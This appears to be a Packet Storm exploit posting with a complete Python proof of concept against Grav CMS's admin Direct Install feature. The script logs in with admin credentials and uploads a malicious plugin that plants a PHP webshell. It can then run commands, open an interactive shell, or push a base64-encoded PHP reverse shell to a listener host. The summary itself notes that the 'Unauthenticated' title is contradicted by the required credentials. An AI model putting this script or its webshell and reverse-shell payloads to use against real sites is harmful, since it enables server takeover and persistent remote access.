Share
## https://sploitus.com/exploit?id=PACKETSTORM:223728
==================================================================================================================================
    | # Title     : Grav CMS < 2.0.0-beta.2 Unauthenticated Plugin Installation leading to RCE                                       |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://getgrav.org/                                                                                             |
    ==================================================================================================================================
    
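    [+] Summary    :  This Python exploit targets a vulnerability in Grav CMS versions prior to 2.0.0-beta.2, abusing the Admin "Direct Install" plugin feature to achieve remote code execution. Note that, although the title says "Unauthenticated", the PoC below takes an admin username and password as required arguments and logs in to the Admin panel before using Direct Install.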
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import argparse
    import base64
    import json
    import os
    import sys
    import time
    import zipfile
    import tempfile
    import re
    import requests
    from urllib.parse import urljoin
    from bs4 import BeautifulSoup
    
    class GravRCE:
        def __init__(self, target_url, username, password, verbose=False, timeout=30):
            self.base_url = target_url.rstrip('/')
            self.username = username
            self.password = password
            self.verbose = verbose
            self.timeout = timeout
            self.session = requests.Session()
            self.session.headers.update({
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            })
            self.csrf_token = None
            self.authenticated = False
            
        def log(self, msg, level="INFO"):
            colors = {
                "SUCCESS": "\033[92m[+]\033[0m",
                "ERROR": "\033[91m[-]\033[0m",
                "WARNING": "\033[93m[!]\033[0m",
                "INFO": "\033[96m[*]\033[0m",
                "PROC": "\033[94m[@]\033[0m"
            }
            print(f"{colors.get(level, '[*]')} {msg}")
        
        def get_csrf_token(self):
            """Extract CSRF token from login page"""
            login_url = urljoin(self.base_url, '/admin/login')
            self.log(f"Fetching CSRF token from {login_url}", "PROC")
            
            try:
                response = self.session.get(login_url, timeout=self.timeout)
                
                if response.status_code == 200:
    
                    soup = BeautifulSoup(response.text, 'html.parser')
    
                    for name in ['admin-nonce', 'csrf', '__csrf', 'nonce']:
                        token_input = soup.find('input', {'name': name})
                        if token_input:
                            self.csrf_token = token_input.get('value')
                            self.log(f"CSRF token found: {self.csrf_token}", "SUCCESS")
                            return True
    
                    meta_tag = soup.find('meta', {'name': 'csrf-token'})
                    if meta_tag:
                        self.csrf_token = meta_tag.get('content')
                        self.log(f"CSRF token found: {self.csrf_token}", "SUCCESS")
                        return True
                
                self.log("Could not find CSRF token", "ERROR")
                return False
                
            except Exception as e:
                self.log(f"Error fetching CSRF token: {e}", "ERROR")
                return False
        
        def authenticate(self):
            """Authenticate to Grav Admin panel"""
            login_url = urljoin(self.base_url, '/admin/login')
            self.log(f"Authenticating as {self.username}...", "PROC")
            
            data = {
                'username': self.username,
                'password': self.password,
                'admin-nonce': self.csrf_token,
                'task': 'login',
                'login': 'Login'
            }
            
            try:
                response = self.session.post(login_url, data=data, timeout=self.timeout)
                
                if response.status_code == 302 or response.status_code == 200:
    
                    if 'dashboard' in response.text.lower() or 'grav' in response.text.lower():
                        self.authenticated = True
                        self.log("Authentication successful", "SUCCESS")
                        return True
                    elif 'invalid' in response.text.lower():
                        self.log("Invalid credentials", "ERROR")
                        return False
                
                self.log(f"Authentication failed: HTTP {response.status_code}", "ERROR")
                return False
                
            except Exception as e:
                self.log(f"Authentication error: {e}", "ERROR")
                return False
        
        def create_malicious_plugin(self, plugin_name, shell_filename):
            """Create malicious plugin ZIP file"""
            self.log(f"Creating malicious plugin: {plugin_name}", "PROC")
    
            temp_dir = tempfile.mkdtemp()
            plugin_dir = os.path.join(temp_dir, plugin_name)
            os.makedirs(plugin_dir)
    
            plugin_php = f'''<?php
    namespace Grav\\Plugin;
    use Grav\\Common\\Plugin;
    
    class {plugin_name.capitalize()}Plugin extends Plugin {{
        public static function getSubscribedEvents(): array {{
            return ['onPluginsInitialized' => ['onPluginsInitialized', 0]];
        }}
        public function onPluginsInitialized(): void {{
            $shell_path = GRAV_ROOT . '/{shell_filename}';
            if (!file_exists($shell_path)) {{
                $shell_content = '<?php if(isset($_REQUEST["cmd"])){{ echo "<pre>"; system($_REQUEST["cmd"]); echo "</pre>"; }} ?>';
                file_put_contents($shell_path, $shell_content);
            }}
        }}
    }}
    ?>
    '''
    
            blueprints = f'''name: {plugin_name.capitalize()}
    version: 1.0.0
    description: "Plugin installed via direct install"
    author:
      name: Grav
    homepage: https://getgrav.org
    license: MIT
    form:
      validation: loose
      fields:
        enabled:
          type: toggle
          label: Plugin status
          highlight: 1
          default: 1
          options:
            1: Enabled
            0: Disabled
          validate:
            type: bool
    '''
    
            plugin_yaml = 'enabled: true\n'
    
            with open(os.path.join(plugin_dir, f"{plugin_name}.php"), 'w') as f:
                f.write(plugin_php)
            
            with open(os.path.join(plugin_dir, "blueprints.yaml"), 'w') as f:
                f.write(blueprints)
            
            with open(os.path.join(plugin_dir, f"{plugin_name}.yaml"), 'w') as f:
                f.write(plugin_yaml)
    
            zip_path = os.path.join(temp_dir, f"{plugin_name}.zip")
            with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zipf:
                for root, dirs, files in os.walk(plugin_dir):
                    for file in files:
                        file_path = os.path.join(root, file)
                        arcname = os.path.relpath(file_path, temp_dir)
                        zipf.write(file_path, arcname)
    
            with open(zip_path, 'rb') as f:
                zip_data = f.read()
    
            import shutil
            shutil.rmtree(temp_dir)
            
            self.log(f"Plugin created: {len(zip_data)} bytes", "SUCCESS")
            return zip_data
        
        def get_admin_nonce(self):
            """Extract admin nonce from direct-install page"""
            direct_install_url = urljoin(self.base_url, '/admin/tools/direct-install')
            self.log("Fetching admin nonce...", "PROC")
            
            try:
                response = self.session.get(direct_install_url, timeout=self.timeout)
                
                if response.status_code == 200:
                    soup = BeautifulSoup(response.text, 'html.parser')
                    nonce_input = soup.find('input', {'name': 'admin-nonce'})
                    
                    if nonce_input:
                        admin_nonce = nonce_input.get('value')
                        self.log(f"Admin nonce obtained: {admin_nonce}", "SUCCESS")
                        return admin_nonce
                
                self.log("Could not find admin nonce", "ERROR")
                return None
                
            except Exception as e:
                self.log(f"Error fetching admin nonce: {e}", "ERROR")
                return None
        
        def upload_plugin(self, zip_data, plugin_name):
            """Upload plugin via Direct Install"""
            direct_install_url = urljoin(self.base_url, '/admin/tools/direct-install')
            self.log(f"Uploading plugin to {direct_install_url}", "PROC")
    
            admin_nonce = self.get_admin_nonce()
            if not admin_nonce:
                return False
    
            files = {
                'admin-nonce': (None, admin_nonce),
                'data[file]': (f'{plugin_name}.zip', zip_data, 'application/zip'),
                'task': (None, 'direct-install')
            }
            
            try:
                response = self.session.post(direct_install_url, files=files, timeout=self.timeout)
                
                if response.status_code == 302 or response.status_code == 200:
                    if 'success' in response.text.lower() or 'installed' in response.text.lower():
                        self.log("Plugin uploaded and installed successfully!", "SUCCESS")
                        return True
                    elif 'error' in response.text.lower():
                        self.log(f"Installation error: {response.text[:200]}", "ERROR")
                        return False
                
                self.log(f"Upload failed: HTTP {response.status_code}", "ERROR")
                return False
                
            except Exception as e:
                self.log(f"Upload error: {e}", "ERROR")
                return False
        
        def trigger_plugin(self):
            """Trigger plugin by accessing main page"""
            self.log("Triggering plugin to deploy webshell...", "PROC")
            
            try:
                response = self.session.get(self.base_url, timeout=self.timeout)
                
                if response.status_code == 200:
                    self.log("Plugin triggered successfully", "SUCCESS")
                    return True
                
                return False
                
            except Exception as e:
                self.log(f"Error triggering plugin: {e}", "ERROR")
                return False
        
        def check_webshell(self, shell_filename):
            """Verify webshell deployment"""
            shell_url = urljoin(self.base_url, shell_filename)
            self.log(f"Checking webshell at {shell_url}", "PROC")
            
            test_cmd = "echo WEBSHELL_TEST"
            
            try:
                response = self.session.get(shell_url, params={'cmd': test_cmd}, timeout=self.timeout)
                
                if response.status_code == 200 and 'WEBSHELL_TEST' in response.text:
                    self.log("Webshell is accessible!", "SUCCESS")
                    return shell_url
                
                return None
                
            except Exception as e:
                self.log(f"Webshell check failed: {e}", "ERROR")
                return None
        
        def execute_command(self, shell_url, cmd):
            """Execute command via webshell"""
            try:
                response = self.session.get(shell_url, params={'cmd': cmd}, timeout=self.timeout)
                
                if response.status_code == 200:
                    output = response.text
                    output = re.sub(r'<pre>', '', output)
                    output = re.sub(r'</pre>', '', output)
                    return output.strip()
                
                return None
                
            except Exception as e:
                self.log(f"Command execution error: {e}", "ERROR")
                return None
        
        def deploy_reverse_shell(self, shell_url, lhost, lport):
            """Deploy reverse shell payload"""
            self.log(f"Deploying reverse shell to {lhost}:{lport}...", "PROC")
    
            rev_shell = f'''<?php
    $sock = fsockopen("{lhost}", {lport});
    if ($sock) {{
        exec("/bin/sh -i <&3 >&3 2>&3", $output);
        fwrite($sock, implode("\\n", $output));
        fclose($sock);
    }}
    ?>'''
            b64_shell = base64.b64encode(rev_shell.encode()).decode()
            deploy_cmd = f"echo '{b64_shell}' | base64 -d > /tmp/revshell.php && php /tmp/revshell.php"
            
            self.execute_command(shell_url, deploy_cmd)
            self.log("Reverse shell payload sent. Check your listener!", "SUCCESS")
        
        def run(self, shell_filename=None, lhost=None, lport=None, command=None):
            """Main exploit routine"""
            
            self.log(f"Target: {self.base_url}")
    
            if not self.get_csrf_token():
                self.log("Failed to get CSRF token", "ERROR")
                return False
    
            if not self.authenticate():
                self.log("Authentication failed", "ERROR")
                return False
    
            plugin_name = "shellplugin_" + str(int(time.time()))
            if not shell_filename:
                shell_filename = f"shell_{int(time.time())}.php"
            
            zip_data = self.create_malicious_plugin(plugin_name, shell_filename)
    
            if not self.upload_plugin(zip_data, plugin_name):
                self.log("Plugin upload failed", "ERROR")
                return False
    
            if not self.trigger_plugin():
                self.log("Failed to trigger plugin", "WARNING")
    
            shell_url = self.check_webshell(shell_filename)
            
            if not shell_url:
                self.log("Webshell not found. Exploit may have failed.", "ERROR")
                return False
    
            if command:
                self.log(f"Executing command: {command}")
                output = self.execute_command(shell_url, command)
                if output:
                    print("\n" + "=" * 60)
                    print(output)
                    print("=" * 60)
            
            elif lhost and lport:
                self.deploy_reverse_shell(shell_url, lhost, lport)
            
            else:
    
                self.log("Interactive shell mode. Type 'exit' to quit.", "SUCCESS")
                print("\n" + "=" * 60)
                print("Webshell available at:", shell_url)
                print("Commands will be executed on the target.")
                print("=" * 60 + "\n")
                
                while True:
                    try:
                        cmd = input("\033[92mshell>\033[0m ").strip()
                        if cmd.lower() in ['exit', 'quit']:
                            break
                        if cmd:
                            output = self.execute_command(shell_url, cmd)
                            if output:
                                print(output)
                    except KeyboardInterrupt:
                        print("\nExiting...")
                        break
            
            return True
    
    
    def main():
        parser = argparse.ArgumentParser(
            description="CVE-2026-42607 - Grav CMS Remote Code Execution",
            epilog="""
    Examples:
      python3 exploit.py -t http://localhost/grav -u admin -p admin123
      python3 exploit.py -t http://localhost/grav -u admin -p admin123 -c "id"
      python3 exploit.py -t http://localhost/grav -u admin -p admin123 --reverse-shell --lhost 10.0.0.5 --lport 4444
      python3 exploit.py -t http://localhost/grav -u admin -p admin123 --interactive
            """
        )
        
        parser.add_argument("-t", "--target", required=True, help="Target Grav CMS URL")
        parser.add_argument("-u", "--username", required=True, help="Grav Admin username")
        parser.add_argument("-p", "--password", required=True, help="Grav Admin password")
        parser.add_argument("-c", "--command", help="Command to execute")
        parser.add_argument("--reverse-shell", action="store_true", help="Deploy reverse shell")
        parser.add_argument("--lhost", help="Listener host for reverse shell")
        parser.add_argument("--lport", type=int, help="Listener port for reverse shell")
        parser.add_argument("--interactive", action="store_true", help="Interactive shell mode")
        parser.add_argument("--shell-file", help="Webshell filename (default: auto-generated)")
        parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
        parser.add_argument("--timeout", type=int, default=30, help="Request timeout (seconds)")
        
        args = parser.parse_args()
        
        print("""
    ╔══════════════════════════════════════════════════════════════════╗
    β•‘  CVE-2026-42607 - Grav CMS Remote Code Execution                β•‘
    β•‘  Unauthenticated Plugin Installation leading to RCE             β•‘
    β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
        """)
        
        exploit = GravRCE(
            target_url=args.target,
            username=args.username,
            password=args.password,
            verbose=args.verbose,
            timeout=args.timeout
        )
        
        if args.reverse_shell:
            if not args.lhost or not args.lport:
                print("[-] --reverse-shell requires --lhost and --lport")
                sys.exit(1)
            success = exploit.run(
                shell_filename=args.shell_file,
                lhost=args.lhost,
                lport=args.lport
            )
        elif args.interactive or args.command:
            success = exploit.run(
                shell_filename=args.shell_file,
                command=args.command
            )
        else:
            success = exploit.run(shell_filename=args.shell_file)
        
        sys.exit(0 if success else 1)
    
    
    if __name__ == "__main__":
        main()
    
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================